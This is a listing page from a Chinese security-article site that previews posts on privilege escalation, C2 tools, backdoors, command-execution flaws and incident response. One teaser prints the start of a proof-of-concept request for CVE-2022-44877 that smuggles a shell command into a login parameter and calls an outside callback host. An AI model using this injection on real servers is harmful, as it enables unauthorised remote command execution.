whoami - 第 7 | CN-SEC 中文网

安全文章

[提权]Win11/2022服务提升system权限

Ladon 11.2 2023.7.11[+]McpPotato .NET>=4.0 Win11/2022提权至System 其它系统自测[u]GUI 加强版NC、Netcat监听客户端连接速...

07月12日285 views评论

阅读全文

安全工具

神兵利器 - Google C2

Google Calendar RAT 是基于 Google Calendar Events 的 Command&Control (C2) 的 PoC，该工具是为那些难以创建完...

06月26日80 views评论

阅读全文

安全百科

Linux提权系列16: [训练营]突破chroot监狱

到目前为止，一直在努力通过不同的技术获得系统上的 root 用户。如果已经是 root 用户但仍然无法访问某些文件并且甚至没有 /root 目录或其他目录（如 /sys 或 /proc）怎么办. 好吧...

06月06日127 views评论

阅读全文

安全工具

Ladon 10.10.6

Ladon 10.10.6 更新功能20230603[u]LadonExp 支持GET连接MS17010漏洞CmdShell执行命令[u]LadonExp ...

06月05日77 views评论

阅读全文

代码审计

Java安全-Groovy

简述Groovy是Apache 旗下的一种基于JVM的面向对象编程语言，既可以用于面向对象编程，也可以用作纯粹的脚本语言。在语言的设计上它吸纳了Python、Ruby 和 Smalltalk 语言的优...

05月30日76 views评论

阅读全文

安全漏洞

浪潮ClusterEngineV4.0 远程命令执行漏洞

胜利和败北都要品尝，经历过四处流浪的辛酸，痛苦和悲伤的回忆，这样才能独当一面，就算痛哭流涕也没关系！漏洞描述浪潮服务器群集管理系统存在危险字符未过滤，导致远程命令执行漏洞影响浪潮Clust...

05月29日93 views评论

阅读全文

安全文章

通过切割环境变量绕过限制实现命令执行

环境搭建：下载IBOS4.5.5建站系统安装成功后源码审计发现zend加密，使用SeayDzend（PHP解密工具）解密然后进...

05月15日48 views评论

阅读全文

安全工具

如何使用WhoAmIMailBot隐藏你的电子邮箱地址

关于WhoAmIMailBot WhoAmIMailBot是一款针对电子邮件服务的安全工具，该工具可以帮助广大研究人员通过自定义配置来隐藏自己的真实电子邮箱地址。该工具受到了Blur项目的启发，而该项...

05月02日82 views评论

阅读全文

安全文章

LD_PRELOAD 后门 | Linux 后门系列

LD_PRELOAD 都快被写烂了，基本都是绕过 disable_functions ，之后分析得也比较完整，比较复杂其实知识点也就是一个加载顺序的问题，之前咱们已经针对PATH的加载路径...

04月02日70 views评论

阅读全文

SecIN安全技术社区

Pikachu靶场-RCE

作者：儒道易行 5.RCE 1.RCE(remote commandcode execute)概述 RCE(remote command/code execute)概述 RCE漏洞，可以让攻击者直接向...

03月12日41 views已关闭评论

阅读全文

应急响应

应急响应--事件溯源

应急响应--事件溯源攻击者对痕迹的处理攻击痕迹混淆：向/var/spool/cron/root 这个持久化的文件里面写入了大量的垃圾数据（好处是不修改创建时间，仅改变了修改时间）###清空历史信息hi...

02月25日69 views评论

阅读全文

安全漏洞

Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877

POC:POST /login/index.php?login=$(ping${IFS}-nc${IFS}2${IFS}`whoami`.{{interactsh-url}}) HTTP/1.1Hos...

01月28日175 views评论

阅读全文

[提权]Win11/2022服务提升system权限

神兵利器 - Google C2

Linux提权系列16: [训练营]突破chroot监狱

Ladon 10.10.6

Java安全-Groovy

浪潮ClusterEngineV4.0 远程命令执行漏洞

通过切割环境变量绕过限制实现命令执行

如何使用WhoAmIMailBot隐藏你的电子邮箱地址

LD_PRELOAD 后门 | Linux 后门系列

Pikachu靶场-RCE

应急响应--事件溯源

Control Web Panel Linux 虚拟主机控制面板 RCE CVE-2022-44877

在线咨询

微信